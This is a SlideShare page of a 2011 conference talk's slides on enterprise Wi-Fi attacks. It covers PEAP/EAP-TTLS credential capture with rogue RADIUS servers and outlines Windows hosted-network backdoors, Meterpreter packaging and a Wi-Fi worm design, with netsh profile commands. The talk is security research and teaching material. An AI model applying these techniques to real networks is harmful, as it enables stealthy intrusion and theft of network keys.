Scenario Based Hacking – Enterprise         Wireless Security                              Vivek Ramachandran             ...
Vivek Ramachandran   B.Tech, ECE         802.1x, Cat65k                 WEP Cloaking       Caffe Latte Attack  IIT Guwahat...
In-Person Trainings       ©SecurityTube.net
SecurityTube Online Certifications                 25+ Countries               ©SecurityTube.net
Free DVD (12+ Hours of HD Videos)         http://www.securitytube.net/downloads                    ©SecurityTube.net
Scenario Based Hacking• Multiple courses are available from different  certification bodies• Concentrate more on tools tha...
The Real World• Complicated scenario• Heterogeneous architecture• Multiple security controls present at the same  time  – ...
Understanding Scenario Based Hacking Component           Scenario 1    Scenario 2         Scenario 3   Scenario 4 Patches ...
Simple Scenarios   Internet                              •   No patches                              •   No AV            ...
Complicated   ©SecurityTube.net
Interesting Ones!  Coffee Shop                              Airport          ©SecurityTube.net
Scenario Based Hacking for Wireless• Enterprise Wireless Attacks  – PEAP  – EAP-TTLS• Enterprise Rogue APs, Worms and Botn...
Enterprise Wireless Attacks    PEAP and EAP-TTLS           ©SecurityTube.net
WPA-Enterprise                                Authenticator               AuthenticationSupplicant                        ...
WPA-Enterprise• Use a RADIUS server for authentication• Different supported EAP types – PEAP, EAP-TTLS, EAP-TLS etc.• De f...
FreeRadius Wireless Pwnage Edition       http://www.willhackforsushi.com/FreeRADIUS-WPE.html                         ©Secu...
WPA/WPA2 Enterprise    EAP Type                  Real World Usage     PEAP                          Highest    EAP-TTLS   ...
PEAP• Protected Extensible Authentication Protocol• Typical usage:   – PEAPv0 with EAP-MSCHAPv2 (most popular)      • Nati...
Source: Layer3.wordpress.com   ©SecurityTube.net
Understanding the Insecurity• Server side certificates   – Fake ones can be created   – Clients may not prompt or user may...
Windows PEAP Hacking Summed Up in 1              Slide                ©SecurityTube.net
Demo of Enterprise Wireless Attacks              PEAP               ©SecurityTube.net
EAP-TTLS•   EAP-Tunneled Transport Layer Security•   Server authenticates with Certificate•   Client can optionally use Ce...
Demo of Enterprise Wireless Attacks            EAP-TTLS               ©SecurityTube.net
Can I be Secure? EAP-TLS• Strongest security of all the EAPs out there• Mandates use of both Server and Client side  certi...
Enterprise Rogue APs, Backdoors,      Worms and Botnets             ©SecurityTube.net
Objective• How Malware could leverage Wi-Fi to create  – Backdoors  – Worms  – Botnets                    ©SecurityTube.net
Background – Understanding Wi-Fi Client Software                         • Allows Client to connect                       ...
Command Line Interaction?• Scanning the air for stored profiles• Profiling the clients based on searches• Different client...
See All Wi-Fi Interfaces Netsh wlan show interfaces           ©SecurityTube.net
Drivers and Capabilities  Netsh wlan show drivers          ©SecurityTube.net
Scan for Available Networks   Netsh wlan show networks            ©SecurityTube.net
View Existing Profiles Netsh wlan show profiles          ©SecurityTube.net
Starting a ProfileNetsh wlan connect name=“vivek”             ©SecurityTube.net
Export a ProfileNetsh wlan export profile name=“vivek”                    ©SecurityTube.net
Creating an Access Point on a Client Device                     • Requirement for special                       drivers an...
Generation 2.0 of Client Software – Hosted                Network • Available Windows 7 and Server 2008 R2 onwards • Virtu...
Feature Objective• To allow creation of a wireless Personal Area  Network (PAN)  – Share data with devices• Network connec...
DemonstrationDemo of Hosted Network        ©SecurityTube.net
Creating a Hosted Network          ©SecurityTube.net
Driver Support     ©SecurityTube.net
Client still remains connected to hard AP!                  ©SecurityTube.net
Wi-Fi Backdoor• Easy for malware to create a backdoor• They key could be:  – Fixed  – Derived based on MAC address of host...
Understanding Rogue Access Points                                  Rogue AP              ©SecurityTube.net
Makes a Rogue AP on every Client!                                               Rogue AP            Rogue AP              ...
Best Part – No Extra Hardware!             ©SecurityTube.net
Advantages?Internet           ©SecurityTube.net
Advantages?                                  Wicked NetworkInternet              ©SecurityTube.net
Why is this cool?• Victim will never notice anything unusual unless he visits his  network settings    – has to be decentl...
Chaining Hosted Networks like a proxy?• Each node has client and AP capability• We can chain them to “hop” machines• Final...
Chaining Infected LaptopsAP     Client   AP             Client    AP   Client                                             ...
Package Meterpreter for full access?• Once attacker connects to his victim, he would  want to have access to everything• W...
DemoCoupling Hosted Network with Metasploit                    ©SecurityTube.net
Increasing Stealth• Passive Monitoring for SSIDs available• Trigger SSID causes Wicked Hosted Network to  start and create...
Karmetasploit• Victim connects by mistake or misassociation• Victim opens browser, Metasploit  Browser_Autopwn exploits th...
Enhancing Karmetasploit• Upon Exploitation, create the hosted network  backdoor• User disconnects, but this hosted network...
What about older clients and other OSs?• Windows < 7, Mac OS do not have the Hosted  Network or alike feature  – Use Ad-Ho...
Hosted Network Meterpreter Scripts         http://zitstif.no-ip.org/meterpreter/rogueap.txt         http://www.digininja.o...
Dissecting Worm Functionality                                       Propagation                                        Tec...
Hosted Network Encryption• Uses WPA2-PSK for encryption• Key is encrypted in configuration file• Can be decrypted • What ...
1. Infect Authorized Computer and Decrypt                Passphrase                  ©SecurityTube.net
Decryption Routine       ©SecurityTube.net
Alternate – Dump and Copy          ©SecurityTube.net
2. Create a Soft Access Point with the same                 Credentials              OfficeAP                            O...
3. Signal Strength Game        OfficeAP                                           OfficeAPWorm Infected Laptop            ...
4. Hop and Exploit OfficeAP                                Exploit            ©SecurityTube.net
5. Replicate and Spread   OfficeAP                                  OfficeAP              ©SecurityTube.net
Worms Wi-Fi Network Signal Strength > AP        OfficeAP                   OfficeAP                                       ...
Wi-Fi Worm• Retrieve the network key for the network• Create a hosted network with the same name• When the victim is in th...
Why is this interesting?• Worm uses its own private Wi-Fi network to  propagate• Does not use the Wired LAN at all• Diffic...
Demo©SecurityTube.net
On the Run     ©SecurityTube.net
APIs for the Hosted Network Feature               ©SecurityTube.net
Questions     Questions?vivek@securitytube.net        ©SecurityTube.net
SecurityTube Online Certifications                 25+ Countries               ©SecurityTube.net
Free DVD (12+ Hours of HD Videos)         http://www.securitytube.net/downloads                    ©SecurityTube.net
Upcoming SlideShare
Loading in …5
×

Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)

4,002 views

Published on

At ClubHack 2011 Hacking and Security Conference Vivek Ramachandran presented on - Scenatio based hacking - enterprise wireless security
Speaker - Vivek Ramachandran

Published in: Education, Technology
1 Comment
6 Likes
Statistics
Notes
  • The Metasploit megaprimer has been re-created with the latest advances and also with a certification: http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/ Testimonials look good.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
4,002
On SlideShare
0
From Embeds
0
Number of Embeds
548
Actions
Shares
0
Downloads
227
Comments
1
Likes
6
Embeds 0
No embeds

No notes for slide

Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)

  1. 1. Scenario Based Hacking – Enterprise Wireless Security Vivek Ramachandran Founder, SecurityTube.net vivek@securitytube.net ©SecurityTube.net
  2. 2. Vivek Ramachandran B.Tech, ECE 802.1x, Cat65k WEP Cloaking Caffe Latte Attack IIT Guwahati Cisco Systems Defcon 15 Toorcon 9Media Coverage Microsoft Trainer, 2011 Wi-Fi Malware, 2011 CBS5, BBC Security Shootout ©SecurityTube.net
  3. 3. In-Person Trainings ©SecurityTube.net
  4. 4. SecurityTube Online Certifications 25+ Countries ©SecurityTube.net
  5. 5. Free DVD (12+ Hours of HD Videos) http://www.securitytube.net/downloads ©SecurityTube.net
  6. 6. Scenario Based Hacking• Multiple courses are available from different certification bodies• Concentrate more on tools than application • Script kiddie mentality• Real world scenarios are not used• Student finds it tough to excel in the real world ©SecurityTube.net
  7. 7. The Real World• Complicated scenario• Heterogeneous architecture• Multiple security controls present at the same time – Firewalls, IDS/IPS, etc.• Requires one to be a Master of all, rather than a Jack of all• Basically “Scenario Based Hacking” ©SecurityTube.net
  8. 8. Understanding Scenario Based Hacking Component Scenario 1 Scenario 2 Scenario 3 Scenario 4 Patches X Present Present Present Personal Firewall X X Present Present AV X X X Present NAT X X X X Firewall X X X X IDS X X X X IPS X X X X WAF X X X X … … ©SecurityTube.net
  9. 9. Simple Scenarios Internet • No patches • No AV • No Firewall • No Network IDS/IPS • Direct Access (No NAT) • ….. ©SecurityTube.net
  10. 10. Complicated ©SecurityTube.net
  11. 11. Interesting Ones! Coffee Shop Airport ©SecurityTube.net
  12. 12. Scenario Based Hacking for Wireless• Enterprise Wireless Attacks – PEAP – EAP-TTLS• Enterprise Rogue APs, Worms and Botnets ©SecurityTube.net
  13. 13. Enterprise Wireless Attacks PEAP and EAP-TTLS ©SecurityTube.net
  14. 14. WPA-Enterprise Authenticator AuthenticationSupplicant Server Association EAPoL Start EAP Request Identity EAP Response Identity EAP Request Identity EAP Packets EAP Packets EAP Success EAP Success PMK to AP 4 Way Handshake Data Transfers ©SecurityTube.net
  15. 15. WPA-Enterprise• Use a RADIUS server for authentication• Different supported EAP types – PEAP, EAP-TTLS, EAP-TLS etc.• De facto server – FreeRadius www.freeradius.org• Depending on EAP type used Client and Server will need to be configured ©SecurityTube.net
  16. 16. FreeRadius Wireless Pwnage Edition http://www.willhackforsushi.com/FreeRADIUS-WPE.html ©SecurityTube.net
  17. 17. WPA/WPA2 Enterprise EAP Type Real World Usage PEAP Highest EAP-TTLS High EAP-TLS Medium LEAP Low EAP-FAST Low …. …. ©SecurityTube.net
  18. 18. PEAP• Protected Extensible Authentication Protocol• Typical usage: – PEAPv0 with EAP-MSCHAPv2 (most popular) • Native support on Windows – PEAPv1 with EAP-GTC• Other uncommon ones – PEAPv0/v1 with EAP-SIM (Cisco)• Uses Server Side Certificates for validation• PEAP-EAP-TLS – Additionally uses Client side Certificates or Smartcards – Supported only by Microsoft ©SecurityTube.net
  19. 19. Source: Layer3.wordpress.com ©SecurityTube.net
  20. 20. Understanding the Insecurity• Server side certificates – Fake ones can be created – Clients may not prompt or user may accept invalid certificates• Setup a Honeypot with FreeRadius-WPE – Client connects – Accepts fake certificate – Sends authentication details over MSCHAPv2 in the TLS tunnel – Attacker’s radius server logs these details – Apply dictionary / reduced possibility bruteforce attack using Asleap by Joshua Wright ©SecurityTube.net
  21. 21. Windows PEAP Hacking Summed Up in 1 Slide  ©SecurityTube.net
  22. 22. Demo of Enterprise Wireless Attacks PEAP ©SecurityTube.net
  23. 23. EAP-TTLS• EAP-Tunneled Transport Layer Security• Server authenticates with Certificate• Client can optionally use Certificate as well• No native support on Windows – 3rd party utilities to be used• Versions – EAP-TTLSv0 – EAP-TTLSv1 ©SecurityTube.net
  24. 24. Demo of Enterprise Wireless Attacks EAP-TTLS ©SecurityTube.net
  25. 25. Can I be Secure? EAP-TLS• Strongest security of all the EAPs out there• Mandates use of both Server and Client side certificates• Required to be supported to get a WPA/WPA2 logo on product• Unfortunately, this is not very popular due to deployment challenges ©SecurityTube.net
  26. 26. Enterprise Rogue APs, Backdoors, Worms and Botnets ©SecurityTube.net
  27. 27. Objective• How Malware could leverage Wi-Fi to create – Backdoors – Worms – Botnets ©SecurityTube.net
  28. 28. Background – Understanding Wi-Fi Client Software • Allows Client to connect to an Access Point • First time user approves it, Auto-Connect for future instances • Details are stored in Configuration Files ©SecurityTube.net
  29. 29. Command Line Interaction?• Scanning the air for stored profiles• Profiling the clients based on searches• Different clients behave differently• Demo ©SecurityTube.net
  30. 30. See All Wi-Fi Interfaces Netsh wlan show interfaces ©SecurityTube.net
  31. 31. Drivers and Capabilities Netsh wlan show drivers ©SecurityTube.net
  32. 32. Scan for Available Networks Netsh wlan show networks ©SecurityTube.net
  33. 33. View Existing Profiles Netsh wlan show profiles ©SecurityTube.net
  34. 34. Starting a ProfileNetsh wlan connect name=“vivek” ©SecurityTube.net
  35. 35. Export a ProfileNetsh wlan export profile name=“vivek” ©SecurityTube.net
  36. 36. Creating an Access Point on a Client Device • Requirement for special drivers and supported cards • Custom software used – HostAPd, Airbase-NG • More feasible on Linux based systems ©SecurityTube.net
  37. 37. Generation 2.0 of Client Software – Hosted Network • Available Windows 7 and Server 2008 R2 onwards • Virtual adapters on the same physical adapter • SoftAP can be created using virtual adapters – DHCP server included “With this feature, a Windows computer can use a single physical wireless adapter to connect as a client to a hardware access point (AP), while at the same time acting as a software AP allowing other wireless-capable devices to connect to it.” http://msdn.microsoft.com/en-us/library/dd815243%28v=vs.85%29.aspx ©SecurityTube.net
  38. 38. Feature Objective• To allow creation of a wireless Personal Area Network (PAN) – Share data with devices• Network connection sharing (ICS) with other devices on the network ©SecurityTube.net
  39. 39. DemonstrationDemo of Hosted Network ©SecurityTube.net
  40. 40. Creating a Hosted Network ©SecurityTube.net
  41. 41. Driver Support ©SecurityTube.net
  42. 42. Client still remains connected to hard AP! ©SecurityTube.net
  43. 43. Wi-Fi Backdoor• Easy for malware to create a backdoor• They key could be: – Fixed – Derived based on MAC address of host, time of day etc.• As host remains connected to authorized network, user does not notice a break in connection• No Message or Prompt displayed ©SecurityTube.net
  44. 44. Understanding Rogue Access Points Rogue AP ©SecurityTube.net
  45. 45. Makes a Rogue AP on every Client! Rogue AP Rogue AP Rogue AP ©SecurityTube.net
  46. 46. Best Part – No Extra Hardware! ©SecurityTube.net
  47. 47. Advantages?Internet ©SecurityTube.net
  48. 48. Advantages? Wicked NetworkInternet ©SecurityTube.net
  49. 49. Why is this cool?• Victim will never notice anything unusual unless he visits his network settings – has to be decently technical to understand• Attacker connects to victim over a private network – no wired side network logs: firewalls, IDS, IPS – Difficult, if not impossible to trace back – Difficult to detect even while attack is ongoing • Abusing legitimate feature, not picked up by AVs, Anti-Malware• More Stealth? Monitor air for other networks, when a specific network comes up, then start the Backdoor ©SecurityTube.net
  50. 50. Chaining Hosted Networks like a proxy?• Each node has client and AP capability• We can chain them to “hop” machines• Final machine can provide Internet access• Like Wi-Fi Repeaters ©SecurityTube.net
  51. 51. Chaining Infected LaptopsAP Client AP Client AP Client Authorized AP ©SecurityTube.net
  52. 52. Package Meterpreter for full access?• Once attacker connects to his victim, he would want to have access to everything• Why not package a Meterpreter with this? • How about a Backdoor post-exploitation script for Metasploit?  ©SecurityTube.net
  53. 53. DemoCoupling Hosted Network with Metasploit ©SecurityTube.net
  54. 54. Increasing Stealth• Passive Monitoring for SSIDs available• Trigger SSID causes Wicked Hosted Network to start and create application level backdoor• Attacker connects and does his job• Shuts off Trigger SSID and Malware goes to Passive Monitoring again ©SecurityTube.net
  55. 55. Karmetasploit• Victim connects by mistake or misassociation• Victim opens browser, Metasploit Browser_Autopwn exploits the system• Hacker gets access!• Biggest Challenge – Victim notices he is connected to the wrong network and disconnects himself ©SecurityTube.net
  56. 56. Enhancing Karmetasploit• Upon Exploitation, create the hosted network backdoor• User disconnects, but this hosted network still remains active• Attacker connects via this network ©SecurityTube.net
  57. 57. What about older clients and other OSs?• Windows < 7, Mac OS do not have the Hosted Network or alike feature – Use Ad-Hoc networks – Use Connect Back mechanism  • When a particular SSID is seen, connect to it automatically • Blurb reporting “Connected to ABC” – Could we kill it?  ©SecurityTube.net
  58. 58. Hosted Network Meterpreter Scripts http://zitstif.no-ip.org/meterpreter/rogueap.txt http://www.digininja.org/projects.php ©SecurityTube.net
  59. 59. Dissecting Worm Functionality Propagation TechniqueWorm Exploit ©SecurityTube.net
  60. 60. Hosted Network Encryption• Uses WPA2-PSK for encryption• Key is encrypted in configuration file• Can be decrypted • What if there is an office network configured on the same machine with WPA2-PSK? ©SecurityTube.net
  61. 61. 1. Infect Authorized Computer and Decrypt Passphrase ©SecurityTube.net
  62. 62. Decryption Routine ©SecurityTube.net
  63. 63. Alternate – Dump and Copy ©SecurityTube.net
  64. 64. 2. Create a Soft Access Point with the same Credentials OfficeAP OfficeAP Worm Infected Laptop ©SecurityTube.net
  65. 65. 3. Signal Strength Game OfficeAP OfficeAPWorm Infected Laptop ©SecurityTube.net
  66. 66. 4. Hop and Exploit OfficeAP Exploit ©SecurityTube.net
  67. 67. 5. Replicate and Spread OfficeAP OfficeAP ©SecurityTube.net
  68. 68. Worms Wi-Fi Network Signal Strength > AP OfficeAP OfficeAP OfficeAP OfficeAP OfficeAP ©SecurityTube.net
  69. 69. Wi-Fi Worm• Retrieve the network key for the network• Create a hosted network with the same name• When the victim is in the vicinity of his office, worm can be activated• At some point the signal strength may be higher than real AP• Other colleagues laptops may hop and connect – Conference rooms, Coffee and Break areas ©SecurityTube.net
  70. 70. Why is this interesting?• Worm uses its own private Wi-Fi network to propagate• Does not use the Wired LAN at all• Difficult for network defenses to detect and mitigate • Targeted APT against an Enterprise ©SecurityTube.net
  71. 71. Demo©SecurityTube.net
  72. 72. On the Run  ©SecurityTube.net
  73. 73. APIs for the Hosted Network Feature ©SecurityTube.net
  74. 74. Questions Questions?vivek@securitytube.net ©SecurityTube.net
  75. 75. SecurityTube Online Certifications 25+ Countries ©SecurityTube.net
  76. 76. Free DVD (12+ Hours of HD Videos) http://www.securitytube.net/downloads ©SecurityTube.net

×